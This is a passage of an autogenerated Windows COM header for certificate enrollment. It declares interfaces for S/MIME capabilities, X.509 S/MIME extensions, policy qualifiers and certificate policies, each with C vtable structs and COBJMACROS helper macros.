            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByIndex )( 
            __RPC__in ISmimeCapabilities * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt ISmimeCapability **pVal);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Count )( 
            __RPC__in ISmimeCapabilities * This,
            /* [retval][out] */ __RPC__out long *pVal);
        
        /* [restricted][helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get__NewEnum )( 
            __RPC__in ISmimeCapabilities * This,
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Add )( 
            __RPC__in ISmimeCapabilities * This,
            /* [in] */ __RPC__in_opt ISmimeCapability *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Remove )( 
            __RPC__in ISmimeCapabilities * This,
            /* [in] */ LONG Index);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Clear )( 
            __RPC__in ISmimeCapabilities * This);
        
        HRESULT ( STDMETHODCALLTYPE *AddFromCsp )( 
            __RPC__in ISmimeCapabilities * This,
            /* [in] */ __RPC__in_opt ICspInformation *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *AddAvailableSmimeCapabilities )( 
            __RPC__in ISmimeCapabilities * This,
            /* [in] */ VARIANT_BOOL MachineContext);
        
        END_INTERFACE
    } ISmimeCapabilitiesVtbl;

    interface ISmimeCapabilities
    {
        CONST_VTBL struct ISmimeCapabilitiesVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ISmimeCapabilities_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ISmimeCapabilities_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ISmimeCapabilities_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ISmimeCapabilities_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ISmimeCapabilities_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ISmimeCapabilities_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ISmimeCapabilities_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ISmimeCapabilities_get_ItemByIndex(This,Index,pVal)	\
    ( (This)->lpVtbl -> get_ItemByIndex(This,Index,pVal) ) 

#define ISmimeCapabilities_get_Count(This,pVal)	\
    ( (This)->lpVtbl -> get_Count(This,pVal) ) 

#define ISmimeCapabilities_get__NewEnum(This,pVal)	\
    ( (This)->lpVtbl -> get__NewEnum(This,pVal) ) 

#define ISmimeCapabilities_Add(This,pVal)	\
    ( (This)->lpVtbl -> Add(This,pVal) ) 

#define ISmimeCapabilities_Remove(This,Index)	\
    ( (This)->lpVtbl -> Remove(This,Index) ) 

#define ISmimeCapabilities_Clear(This)	\
    ( (This)->lpVtbl -> Clear(This) ) 

#define ISmimeCapabilities_AddFromCsp(This,pValue)	\
    ( (This)->lpVtbl -> AddFromCsp(This,pValue) ) 

#define ISmimeCapabilities_AddAvailableSmimeCapabilities(This,MachineContext)	\
    ( (This)->lpVtbl -> AddAvailableSmimeCapabilities(This,MachineContext) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ISmimeCapabilities_INTERFACE_DEFINED__ */


#ifndef __IX509ExtensionSmimeCapabilities_INTERFACE_DEFINED__
#define __IX509ExtensionSmimeCapabilities_INTERFACE_DEFINED__

/* interface IX509ExtensionSmimeCapabilities */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509ExtensionSmimeCapabilities;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab31b-217d-11da-b2a4-000e7bbb2b09")
    IX509ExtensionSmimeCapabilities : public IX509Extension
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeEncode( 
            /* [in] */ __RPC__in_opt ISmimeCapabilities *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_SmimeCapabilities( 
            /* [retval][out] */ __RPC__deref_out_opt ISmimeCapabilities **ppValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IX509ExtensionSmimeCapabilitiesVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509ExtensionSmimeCapabilities * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509ExtensionSmimeCapabilities * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509ExtensionSmimeCapabilities * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509ExtensionSmimeCapabilities * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509ExtensionSmimeCapabilities * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509ExtensionSmimeCapabilities * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509ExtensionSmimeCapabilities * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509ExtensionSmimeCapabilities * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509ExtensionSmimeCapabilities * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509ExtensionSmimeCapabilities * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Critical )( 
            __RPC__in IX509ExtensionSmimeCapabilities * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_Critical )( 
            __RPC__in IX509ExtensionSmimeCapabilities * This,
            /* [in] */ VARIANT_BOOL Value);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeEncode )( 
            __RPC__in IX509ExtensionSmimeCapabilities * This,
            /* [in] */ __RPC__in_opt ISmimeCapabilities *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509ExtensionSmimeCapabilities * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SmimeCapabilities )( 
            __RPC__in IX509ExtensionSmimeCapabilities * This,
            /* [retval][out] */ __RPC__deref_out_opt ISmimeCapabilities **ppValue);
        
        END_INTERFACE
    } IX509ExtensionSmimeCapabilitiesVtbl;

    interface IX509ExtensionSmimeCapabilities
    {
        CONST_VTBL struct IX509ExtensionSmimeCapabilitiesVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509ExtensionSmimeCapabilities_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509ExtensionSmimeCapabilities_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509ExtensionSmimeCapabilities_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509ExtensionSmimeCapabilities_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509ExtensionSmimeCapabilities_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509ExtensionSmimeCapabilities_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509ExtensionSmimeCapabilities_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509ExtensionSmimeCapabilities_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509ExtensionSmimeCapabilities_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509ExtensionSmimeCapabilities_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define IX509ExtensionSmimeCapabilities_get_Critical(This,pValue)	\
    ( (This)->lpVtbl -> get_Critical(This,pValue) ) 

#define IX509ExtensionSmimeCapabilities_put_Critical(This,Value)	\
    ( (This)->lpVtbl -> put_Critical(This,Value) ) 


#define IX509ExtensionSmimeCapabilities_InitializeEncode(This,pValue)	\
    ( (This)->lpVtbl -> InitializeEncode(This,pValue) ) 

#define IX509ExtensionSmimeCapabilities_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define IX509ExtensionSmimeCapabilities_get_SmimeCapabilities(This,ppValue)	\
    ( (This)->lpVtbl -> get_SmimeCapabilities(This,ppValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509ExtensionSmimeCapabilities_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0028 */
/* [local] */ 

typedef 
enum PolicyQualifierType
    {	PolicyQualifierTypeUnknown	= 0,
	PolicyQualifierTypeUrl	= 1,
	PolicyQualifierTypeUserNotice	= 2
    } 	PolicyQualifierType;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0028_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0028_v0_0_s_ifspec;

#ifndef __IPolicyQualifier_INTERFACE_DEFINED__
#define __IPolicyQualifier_INTERFACE_DEFINED__

/* interface IPolicyQualifier */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IPolicyQualifier;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab31c-217d-11da-b2a4-000e7bbb2b09")
    IPolicyQualifier : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeEncode( 
            /* [in] */ __RPC__in BSTR strQualifier,
            /* [in] */ PolicyQualifierType Type) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ObjectId( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Qualifier( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Type( 
            /* [retval][out] */ __RPC__out PolicyQualifierType *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_RawData( 
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IPolicyQualifierVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IPolicyQualifier * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IPolicyQualifier * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IPolicyQualifier * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IPolicyQualifier * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IPolicyQualifier * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IPolicyQualifier * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IPolicyQualifier * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeEncode )( 
            __RPC__in IPolicyQualifier * This,
            /* [in] */ __RPC__in BSTR strQualifier,
            /* [in] */ PolicyQualifierType Type);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IPolicyQualifier * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Qualifier )( 
            __RPC__in IPolicyQualifier * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Type )( 
            __RPC__in IPolicyQualifier * This,
            /* [retval][out] */ __RPC__out PolicyQualifierType *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IPolicyQualifier * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IPolicyQualifierVtbl;

    interface IPolicyQualifier
    {
        CONST_VTBL struct IPolicyQualifierVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IPolicyQualifier_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IPolicyQualifier_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IPolicyQualifier_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IPolicyQualifier_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IPolicyQualifier_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IPolicyQualifier_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IPolicyQualifier_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IPolicyQualifier_InitializeEncode(This,strQualifier,Type)	\
    ( (This)->lpVtbl -> InitializeEncode(This,strQualifier,Type) ) 

#define IPolicyQualifier_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IPolicyQualifier_get_Qualifier(This,pValue)	\
    ( (This)->lpVtbl -> get_Qualifier(This,pValue) ) 

#define IPolicyQualifier_get_Type(This,pValue)	\
    ( (This)->lpVtbl -> get_Type(This,pValue) ) 

#define IPolicyQualifier_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IPolicyQualifier_INTERFACE_DEFINED__ */


#ifndef __IPolicyQualifiers_INTERFACE_DEFINED__
#define __IPolicyQualifiers_INTERFACE_DEFINED__

/* interface IPolicyQualifiers */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IPolicyQualifiers;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab31d-217d-11da-b2a4-000e7bbb2b09")
    IPolicyQualifiers : public IDispatch
    {
    public:
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_ItemByIndex( 
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt IPolicyQualifier **pVal) = 0;
        
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_Count( 
            /* [retval][out] */ __RPC__out long *pVal) = 0;
        
        virtual /* [restricted][helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get__NewEnum( 
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Add( 
            /* [in] */ __RPC__in_opt IPolicyQualifier *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Remove( 
            /* [in] */ LONG Index) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Clear( void) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IPolicyQualifiersVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IPolicyQualifiers * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IPolicyQualifiers * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IPolicyQualifiers * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IPolicyQualifiers * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IPolicyQualifiers * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IPolicyQualifiers * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IPolicyQualifiers * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByIndex )( 
            __RPC__in IPolicyQualifiers * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt IPolicyQualifier **pVal);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Count )( 
            __RPC__in IPolicyQualifiers * This,
            /* [retval][out] */ __RPC__out long *pVal);
        
        /* [restricted][helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get__NewEnum )( 
            __RPC__in IPolicyQualifiers * This,
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Add )( 
            __RPC__in IPolicyQualifiers * This,
            /* [in] */ __RPC__in_opt IPolicyQualifier *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Remove )( 
            __RPC__in IPolicyQualifiers * This,
            /* [in] */ LONG Index);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Clear )( 
            __RPC__in IPolicyQualifiers * This);
        
        END_INTERFACE
    } IPolicyQualifiersVtbl;

    interface IPolicyQualifiers
    {
        CONST_VTBL struct IPolicyQualifiersVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IPolicyQualifiers_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IPolicyQualifiers_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IPolicyQualifiers_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IPolicyQualifiers_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IPolicyQualifiers_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IPolicyQualifiers_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IPolicyQualifiers_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IPolicyQualifiers_get_ItemByIndex(This,Index,pVal)	\
    ( (This)->lpVtbl -> get_ItemByIndex(This,Index,pVal) ) 

#define IPolicyQualifiers_get_Count(This,pVal)	\
    ( (This)->lpVtbl -> get_Count(This,pVal) ) 

#define IPolicyQualifiers_get__NewEnum(This,pVal)	\
    ( (This)->lpVtbl -> get__NewEnum(This,pVal) ) 

#define IPolicyQualifiers_Add(This,pVal)	\
    ( (This)->lpVtbl -> Add(This,pVal) ) 

#define IPolicyQualifiers_Remove(This,Index)	\
    ( (This)->lpVtbl -> Remove(This,Index) ) 

#define IPolicyQualifiers_Clear(This)	\
    ( (This)->lpVtbl -> Clear(This) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IPolicyQualifiers_INTERFACE_DEFINED__ */


#ifndef __ICertificatePolicy_INTERFACE_DEFINED__
#define __ICertificatePolicy_INTERFACE_DEFINED__

/* interface ICertificatePolicy */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertificatePolicy;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab31e-217d-11da-b2a4-000e7bbb2b09")
    ICertificatePolicy : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ __RPC__in_opt IObjectId *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ObjectId( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_PolicyQualifiers( 
            /* [retval][out] */ __RPC__deref_out_opt IPolicyQualifiers **ppValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct ICertificatePolicyVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertificatePolicy * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertificatePolicy * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertificatePolicy * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertificatePolicy * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertificatePolicy * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertificatePolicy * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertificatePolicy * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ICertificatePolicy * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in ICertificatePolicy * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PolicyQualifiers )( 
            __RPC__in ICertificatePolicy * This,
            /* [retval][out] */ __RPC__deref_out_opt IPolicyQualifiers **ppValue);
        
        END_INTERFACE
    } ICertificatePolicyVtbl;

    interface ICertificatePolicy
    {
        CONST_VTBL struct ICertificatePolicyVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertificatePolicy_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertificatePolicy_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertificatePolicy_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertificatePolicy_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertificatePolicy_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertificatePolicy_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertificatePolicy_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertificatePolicy_Initialize(This,pValue)	\
    ( (This)->lpVtbl -> Initialize(This,pValue) ) 

#define ICertificatePolicy_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define ICertificatePolicy_get_PolicyQualifiers(This,ppValue)	\
    ( (This)->lpVtbl -> get_PolicyQualifiers(This,ppValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertificatePolicy_INTERFACE_DEFINED__ */


#ifndef __ICertificatePolicies_INTERFACE_DEFINED__
#define __ICertificatePolicies_INTERFACE_DEFINED__

/* interface ICertificatePolicies */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertificatePolicies;

